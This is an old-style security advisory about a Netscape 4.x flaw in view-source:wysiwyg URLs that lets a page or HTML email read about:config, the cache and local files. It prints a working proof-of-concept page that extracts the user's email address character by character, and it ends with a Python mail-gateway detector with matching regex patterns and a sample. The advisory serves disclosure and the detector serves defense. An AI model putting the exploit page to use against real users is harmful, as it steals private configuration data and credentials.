COMMAND

    Netscape

SYSTEMS AFFECTED

    Netscape 4.x

PROBLEM

    Georgi Guninski found the following. There is a security
    vulnerability in Netscape Communicator 4.6 Win95 and 4.07 Linux
    (probably all 4.x versions) in the way it handles
    "view-source:wysiwyg://1/javascript" URLs. It parses them in a
    "view-source" window. The problem is that this allows access to
    documents included in the parent document via ILAYER
    SRC="view-source:wysiwyg://1/" using find(), which in turn allows
    reading the whole parsed document. Vulnerabilities:

      - Browsing local directories
      - Reading user's cache
      - Reading parsed HTML files
      - Reading Netscape's configuration ("about:config"), including
        the user's email address, mail servers and password.
      - Probably others

    This vulnerability may be exploited by using an HTML email message.
    A demonstration is available at:

        http://www.nat.bg/~joro/viewsource.html

    viewsource.html:

    <HTML>
    <BODY>
    <SCRIPT>

    s="view-source:wysiwyg://1/javascript:s='<TITLE>tttt</TITLE>vvvv>>"
    +"<ILAYER SRC=\"view-source:wysiwyg://1/about:config\"></ILAYER>"
    +" <SCRIPT>blur();msg1=\"Your email is: \"; mend=\"general.\"+\"title_tips\";mag=\"mail.identity.useremail\"+\" = \";sp=\" \";res=mag;charstoread=50;"
    +"setTimeout(\" "
    +"for(i=0;i<charstoread;i++) {"
    +" t=res;"
    +" find(mend);"
    +" for(c=1;c<256;c++) {"
    +"   t=res + String.fromCharCode(c);"
    +"     if (find(t,true,true)) {"
    +"      res=t;"
    +"      if (c==32) i=charstoread+1"
    +"     } "
    +" }"
    +"}"
    +"res=res.substring(mag.length);"
    +"alert(msg1 + res);"
    +" ;\",3000);</"+"SCRIPT>'";
    //a=window.open(s);
    location=s;


    </SCRIPT>

    </BODY>
    </HTML>

SOLUTION

    Workaround: Disable JavaScript. Netscape has been notified of the
    problem.
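
    Added example (not part of the original advisory): a mail-gateway or
    proxy content check in Python that flags an HTML page or HTML mail
    part carrying the chain described above: a view-source:wysiwyg://
    URL, an ILAYER whose SRC is another view-source: URL, and a
    view-source: URL aimed at about:config or local files. The indicator
    names, the "about:cache" URL assumed for the cache listing, and the
    two sample bodies are my own constructions.

```python
import re

# Indicators taken from the advisory. The patterns tolerate a backslash
# before the quote because the exploit page builds its ILAYER markup
# inside a JavaScript string literal (SRC=\"view-source:...\").
INDICATORS = {
    "view_source_wysiwyg": re.compile(r"view-source:\s*wysiwyg://\d+/", re.I),
    "ilayer_view_source": re.compile(
        r"<ILAYER\b[^>]*\bSRC\s*=\s*\\?[\"']?\s*view-source:", re.I),
    # Targets the advisory names: about:config, local directories (file:);
    # about:cache is assumed here as the URL for the user's cache listing.
    "view_source_sensitive": re.compile(
        r"view-source:(?:wysiwyg://\d+/)?(?:about:config|about:cache|file:)",
        re.I),
    # find() is how the exploit reads the layer back one character at a time.
    "find_call": re.compile(r"\bfind\s*\(", re.I),
}

def scan_html(body: str) -> dict:
    """Count each indicator in an HTML body (page or HTML e-mail part)."""
    return {name: len(rx.findall(body)) for name, rx in INDICATORS.items()}

def verdict(body: str) -> str:
    """'block' when the full chain is present (view-source:wysiwyg:// URL plus
    an ILAYER pointing at view-source:, or a view-source: URL aimed at
    about:config / cache / local files); 'review' for a lone
    view-source:wysiwyg:// URL; otherwise 'allow'."""
    hits = scan_html(body)
    if hits["view_source_sensitive"] or (
            hits["view_source_wysiwyg"] and hits["ilayer_view_source"]):
        return "block"
    if hits["view_source_wysiwyg"]:
        return "review"
    return "allow"

# Constructed sample modelled on the advisory's viewsource.html (not a copy).
EXPLOIT_SAMPLE = r'''<SCRIPT>
s="view-source:wysiwyg://1/javascript:s='<TITLE>t</TITLE>"
+"<ILAYER SRC=\"view-source:wysiwyg://1/about:config\"></ILAYER>"
+"<SCRIPT>for(c=1;c<256;c++){if(find(t,true,true))res=t;}</"+"SCRIPT>'";
location=s;
</SCRIPT>'''

# Constructed benign sample: an ordinary ILAYER and a harmless find() call.
BENIGN_SAMPLE = '<ILAYER SRC="banner.html"></ILAYER><SCRIPT>find("hello")</SCRIPT>'

if __name__ == "__main__":
    for label, body in (("exploit", EXPLOIT_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, verdict(body), scan_html(body))
```

    A lone find() call is counted but never blocks on its own, since it is
    a normal Netscape 4 DOM method.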